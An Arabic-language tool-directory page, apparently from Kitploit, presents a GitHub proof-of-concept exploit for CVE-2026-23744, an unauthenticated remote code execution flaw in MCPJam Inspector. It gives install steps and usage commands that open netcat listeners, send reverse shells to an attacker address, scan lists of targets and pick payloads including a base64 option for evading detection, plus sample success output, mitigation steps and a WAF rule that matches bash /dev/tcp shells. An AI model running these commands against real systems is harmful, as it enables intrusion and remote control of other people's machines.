Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23744-MCPJam-Exploit — استغلال لإثبات المفهوم لثغرة CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE). توضح هذه الأداة الخلل الأمني في الإصدارات <=1.4.2 وتساعد باحثي الأمن في التحقق من التصحيحات. لأغراض الاختبار المصرح به والتعليم فقط. تتضمن خيارات متعددة للحمولات، تنفيذ الأوامر، وإدارة الجلسات. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمتطوير الحمولات
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

عرض المستودع
714منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

استغلال لإثبات المفهوم لثغرة CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE). توضح هذه الأداة الخلل الأمني في الإصدارات <=1.4.2 وتساعد باحثي الأمن في التحقق من التصحيحات. لأغراض الاختبار المصرح به والتعليم فقط. تتضمن خيارات متعددة للحمولات، تنفيذ الأوامر، وإدارة الجلسات.

مشاركة

CVE-2026-23744 MCPJam Inspector RCE Exploit

Security Research Python 3.7+ Version Author


⚠️ إخلاء مسؤولية

هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. الاستخدام غير المصرح به غير قانوني. يتحمل المستخدمون كامل المسؤولية عن أفعالهم.


📋 نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم لاستغلال الثغرة CVE-2026-23744، وهي ثغرة تنفيذ أوامر عن بعد (RCE) غير مصادق عليها تم اكتشافها في MCPJam Inspector الإصدارات <=1.4.2. الثغرة لها درجة CVSS حرجة تبلغ 9.8، مما يشير إلى خطر شديد مع متجه هجوم شبكي.

السمةالتفاصيل
معرف CVECVE-2026-23744
الثغرةتنفيذ أوامر عن بعد غير مصادق عليه
الإصدارات المتأثرة<=1.4.2
درجة CVSS9.8 (حرجة)
متجه الهجومشبكة

📸 لقطات الشاشة

مثال

🚀 الميزات

تقدم أداة الاستغلال مجموعة شاملة من الميزات المصممة لاختبار الأمان الفعال:

  • دعم حمولات متعددة: يشمل حمولات Bash و Python و Netcat و Perl و PHP و Base64.
  • تنفيذ الأوامر: تنفيذ أوامر على النظام المستهدف مع التقاط المخرجات.
  • فحص الأهداف: فحص أهداف متعددة مع تحديد معدل الطلبات قابل للتكوين.
  • إدارة الجلسات: إدارة جلسات مستمرة للاختبار المستمر.
  • دعم الوكيل: التكامل مع الوكلاء للاتصالات المجهولة أو الموجهة.
  • بصمة الهدف: تحديد خصائص النظام المستهدف.
  • إعداد المستمع التلقائي: تكوين المستمعين تلقائياً للقذائف العكسية.

📦 التثبيت

لإعداد أداة الاستغلال، اتبع هذه الخطوات:

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. تثبيت التبعيات:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 أمثلة الاستخدام

الاستغلال الأساسي

لبدء استغلال أساسي، قم أولاً بإعداد مستمع، ثم شغّل سكريبت الاستغلال:

root@kitploit:~
# بدء المستمع
nc -lvnp 4444

# تشغيل الاستغلال
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

تنفيذ الأوامر

تنفيذ أوامر فردية أو أوامر من ملف:

root@kitploit:~
# تنفيذ أمر واحد
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# تنفيذ أوامر من ملف
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

حمولات مختلفة

استخدام أنواع حمولات متنوعة لسيناريوهات مختلفة:

root@kitploit:~
# قذيفة عكسية بـ Python
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# قذيفة عكسية بـ Netcat
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# حمولة مشفرة بـ Base64
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

فحص الأهداف

فحص أهداف متعددة للبحث عن الثغرة:

root@kitploit:~
# إنشاء ملف الأهداف
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# فحص الأهداف المعرضة للخطر
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

خيارات متقدمة

استكشاف وظائف متقدمة مثل البصمة، استخدام الوكيل، الوضع المفصل، وإعداد المستمع التلقائي:

root@kitploit:~
# مع البصمة
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# مع الوكيل
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# وضع مفصل
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# مستمع تلقائي
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 أنواع الحمولات

النوعالأمرالأفضل لـ
bashBash reverse shellمعظم أنظمة Linux
pythonPython3 reverse shellالأنظمة المثبت عليها Python
ncNetcat reverse shellالأنظمة المثبت عليها netcat
perlPerl reverse shellالأنظمة المثبت عليها Perl
phpPHP reverse shellالأنظمة المثبت عليها PHP
base64Base64 encodedتجنب الكشف

📊 مثال على الإخراج

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ التخفيف

إجراءات فورية

للحماية من CVE-2026-23744، من الضروري اتخاذ الإجراءات الفورية التالية:

  • ترقية MCPJam Inspector إلى إصدار >1.4.2.
  • عزل الأنظمة المتأثرة عن الشبكة.
  • مراقبة طلبات POST المشبوهة إلى /api/mcp/connect.
  • تطبيق قواعد جدار حماية تطبيقات الويب (WAF) لحظر الأنماط الضارة.

مثال على قاعدة WAF

مثال على قاعدة WAF لـ Nginx لحظر الأنماط الضارة الشائعة:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ الأسئلة الشائعة

س: هل هذا قانوني للاستخدام؟

ج: هذه الأداة قانونية فقط للاستخدام على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.

س: ما الأنظمة المعرضة للخطر؟

ج: إصدارات MCPJam Inspector <=1.4.2 هي المعرضة للخطر.

س: كيف يمكنني حماية أنظمتي؟

ج: قم بترقية MCPJam Inspector إلى إصدار >1.4.2 فوراً.


📚 المراجع

  • CVE-2026-23744 MITRE

👤 المؤلف

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 سجل التغييرات

الإصدار 2.0 (14 يوليو 2026)

  • ✅ تم إصلاح موثوقية فحص المستمع
  • ✅ تم تنفيذ وضع تنفيذ الأوامر
  • ✅ تمت إضافة بصمة الهدف
  • ✅ تحسين إدارة الجلسات
  • ✅ تمت إضافة حمولات احتياطية

الإصدار 1.0 (10 يوليو 2026)

  • ✅ الإصدار الأولي

⚠️ تحذير نهائي

الاستخدام غير المصرح به لهذه الأداة غير قانوني ويمكن أن يؤدي إلى عواقب وخيمة، بما في ذلك:

  • الملاحقة الجنائية
  • الدعاوى المدنية
  • سجل جنائي دائم
  • عقوبات مهنية

صنع بـ ❤️ بواسطة Sudeepa Wanigarathna

تنزيل الأداة